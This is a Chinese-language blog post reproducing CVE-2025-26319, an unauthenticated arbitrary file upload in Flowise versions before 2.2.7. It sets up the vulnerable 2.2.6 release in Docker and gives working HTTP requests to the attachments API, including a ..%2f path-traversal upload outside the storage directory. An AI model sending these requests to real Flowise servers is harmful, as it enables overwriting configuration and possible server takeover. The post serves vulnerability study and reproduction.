当前位置: 首页 > java >正文

Flowise 任意文件上传漏洞 含Flowise Docker安装、漏洞复现(CVE-2025-26319)

漏洞简介

Flowise是一个开源且易于使用的框架,旨在帮助开发者快速而灵活地构建大型语言模型(LLM)应用程序。其小于2.2.7的旧版本中‘attachments’接口存在一个任意文件上传漏洞,未经授权的远程攻击者可以利用该接口上传任意内容到指定位置,可覆盖应用配置,并有可能实现远程代码执行导致服务器失陷。

 漏洞链接:阿里云漏洞库

漏洞复现:

Flowise安装:GitHub - FlowiseAI/Flowise: Build AI Agents, Visually

这里使用docker安装,拉镜像:

docker pull flowiseai/flowise:2.2.6

准备:

# 在任何你喜欢的位置创建目录
mkdir -p my-flowise
cd my-flowise# 创建 docker-compose.yml
nano docker-compose.yml

yml文件添加下面内容:

version: '3.8'
services:flowise:image: flowiseai/flowise:2.2.6container_name: flowiseports:- "3000:3000"environment:- PORT=3000- FLOWISE_USERNAME=admin- FLOWISE_PASSWORD=your_secure_password- DATABASE_TYPE=sqlitevolumes:- ./database:/app/databaserestart: unless-stopped

运行:

# 启动服务
docker-compose up -d# 查看日志
docker-compose logs -f

访问3000端口即可

直接抓包,向对应路径 /api/v1/attachments/ POST 上传文件即可

POST /api/v1/attachments/fff/fff HTTP/1.1
Host: *******:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0
Accept: application/json, text/plain, */*
x-request-from: internal
Referer: http://*******:3000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 192------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="1.txt"
Content-Type: text/plainCVE-2025-26319
------WebKitFormBoundary7MA4YWxkTrZu0gW--

展示一下文件,成功上传在storage目录下:

可通过..%2f穿越目录上传文件:

POST /api/v1/attachments/..%2f..%2ffff/fff HTTP/1.1
Host: ******:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0
Accept: application/json, text/plain, */*
x-request-from: internal
Referer: http://********:3000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 192------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="1.txt"
Content-Type: text/plainCVE-2025-26319
------WebKitFormBoundary7MA4YWxkTrZu0gW--

成功上传到root下:

http://www.xdnf.cn/news/18497.html

相关文章:

  • 如何使用 DeepSeek 助力工作:全面指南​
  • AWS OpenSearch 是什么
  • ROS2下YOLO+Moveit+PCL机械臂自主避障抓取方案
  • 如何理解AP服务发现协议中“如果某项服务需要被配置为可通过多个不同的网络接口进行访问,则应为每个网络接口使用一个独立的客户端服务实例”?
  • Unreal Engine APawn 与 ACharacter 比较
  • 停车场道闸的常见形式
  • Docker的安装
  • 什么是数据分类分级?数据分类分级技术实现路径及产品推荐
  • 逆向代码笔记
  • centos7安装oracle19c流程(自用)
  • 全面解析 `strchr` 字符串查找函数
  • 闲置笔记本链接硬盘盒充当Windows NAS 网易UU远程助力数据读取和处理
  • vivo招AI架构专家(AI Agent方向)
  • 云原生(Cloud Native)技术概述
  • 密码管理中硬编码密码
  • react的基本使用
  • 【学习记录】structuredClone,URLSearchParams,groupBy
  • 树莓派采集、计算机推理:基于GStreamer的YOLOv5实现方案
  • 隧道代理无需手动获取IP的核心机制与技术优势
  • 纯手撸一个RAG
  • SSM从入门到实战: 2.6 MyBatis缓存机制与性能优化
  • skywalking-agent与logback-spring.xml中的traceId自动关联的原理
  • 三,设计模式-抽象工厂模式
  • 深入解析TCP/UDP协议与网络编程
  • Leetcode—120. 三角形最小路径和【中等】(腾讯校招面试题)
  • SSM框架基础知识-Spring-Spring整合MyBatis
  • 基于SpringBoot+Vue框架的高校论坛系统 博客论坛系统 论坛小程序
  • 图神经网络分享系列-LINE(三)
  • Oracle SYS用户无法登录数据库-ORA-12162
  • Chrome和Edge如何开启暗黑模式